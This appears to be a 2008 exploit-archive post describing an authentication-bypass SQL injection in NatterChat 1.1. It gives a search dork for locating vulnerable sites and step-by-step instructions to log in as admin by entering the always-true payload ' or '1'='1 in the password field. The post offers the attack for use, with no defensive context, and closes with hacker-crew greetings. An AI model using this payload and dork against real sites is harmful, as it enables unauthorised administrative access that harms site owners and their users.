[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NatterChat 1.1 (Auth Bypass) Remote SQL Injection Vulnerability
# Published : 2008-11-20
# Author : Bl@ckbe@rD
# Previous Title : wPortfolio <= 0.3 Admin Password Changing Exploit
# Next Title : PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
[+] Script Name : NATTERCHAT v1.1 remote login bypass
[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT')
[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
[+] Dork : Powered by NATTERCHAT v 1.1
--//-->
[+] Expl0iT :
1) Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp
2) Username : admin
Password : ' or '1'='1
3) You are the Admin now!
N.B : U can aplly an SQL query in both (Username or Password) but we done only ' or '1'='1 coz it's always true then we can simply bypass the login page
--//-->
[+] Greetz : hak3r-b0y , Underz0ne Crew , king Of Hacker , Zigma , micro0x02 ...
# www.Syue.com [2008-11-20]